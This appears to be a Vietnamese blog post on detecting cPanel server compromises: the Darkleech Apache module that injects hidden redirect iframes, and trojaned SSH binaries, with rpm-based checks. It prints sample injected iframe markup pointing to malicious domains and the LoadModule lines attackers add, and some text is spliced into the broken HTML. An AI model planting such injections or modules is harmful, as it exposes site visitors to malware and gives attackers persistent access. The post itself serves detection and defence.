Cpanel-based servers bị redirect về những trang web xấu
Tuy nhiên trong vòng 1 năm trở lại đây, 1 cách thức mới để chèn các đoạn mã độc này đã xuất hiện, đó là thông qua các Apache module
Để xác định việc bị nhiễm thông qua Apache module, chúng ta hãy xem cách thức 1 iframe được chèn vào như sau:
style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframeDomain name được thay đổi thường xuyên nhưng IP thường là 62.75.235.48), cùng với các thẻ div class name and the iframe sizes.
src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div>
or
<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <divhttx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div>
1. Darkleech Apache Module
Attackers thay đổi trong file httpd.conf hay bất cứ file này trong file cấu hình của apache và chèn dòng sau để load module:LoadModule pool_mem_module /lib64/libwutfa.so.2Tên và vị trí của module là ngẫu nhiên và md5 checksums thì thay đổi thường xuyên:
or
LoadModule bench_proxy_module /lib64/libhdast.so.1
or
LoadModule string_log_module /usr/lib/libcehf.so.7
6b704ca7d3454830d212c88ffd6250c0Tuy nhiên, một khi đã được load, chúng chèn iframe vào site 1 lần 1 ngày đối với mỗi đia chỉ IP, điều đó có nghĩa là mỗi IP chỉ bị nhiễm độc 1 lần/ngày và chỉ xảy ra trên thiết bị người dùng. Điều đó làm cho việc phát hiện và theo dõi trở nên khó khăn hơn rất nhiều
61051d0d1c7bdc109aa27732b94c94c0
82b0da95b511cdd02b377072b4fcada7
Để xác định một module không chính thống, ta sử dụng lệnh sau:
# rpm -qf /lib64/*Nếu một module không thuộc bất cứ gói nào (not owned by anyone), có thể nó chính là các modules được add thêm bới attacker.
# rpm -qf /usr/lib/*
# rpm -qf /etc/httpd/modules/*
2. SSHD binary
Một cách thức nữa trong việc xâm nhập hệ thống mà ít được đề cập đến là attacker lưu giữ những truy nhập vào hệ thống như thế nào? Nhiều nghiên cứu cho rằng, có thể đó là do attacker đã thay đổi các file binary của SSH và thay thế vào đó là một version khác để có thể truy cập trở lại server. Sự thay đổi này không chỉ cho phép attacker có thể login vào server mà không cần cơ chế chứng thực mà nó còn cho phép lấy cắp tất cả các SSH authentication và gửi về 1 server khác.Để kiểm tra sự thay đổi của file, ta dùng lệnh rpm -Va và có kết quả sau:
S.5…… /usr/bin/scp
S.5…… /usr/bin/sftp
S.5…… /usr/bin/ssh
S.5…… /usr/bin/sshd
S.5…… /usr/bin/ssh-add
S.5…… /usr/bin/ssh-keyscan
S.5…… /usr/bin/ssh-keygen
----------------------------------------------------------------------
Nhận xét
Đăng nhận xét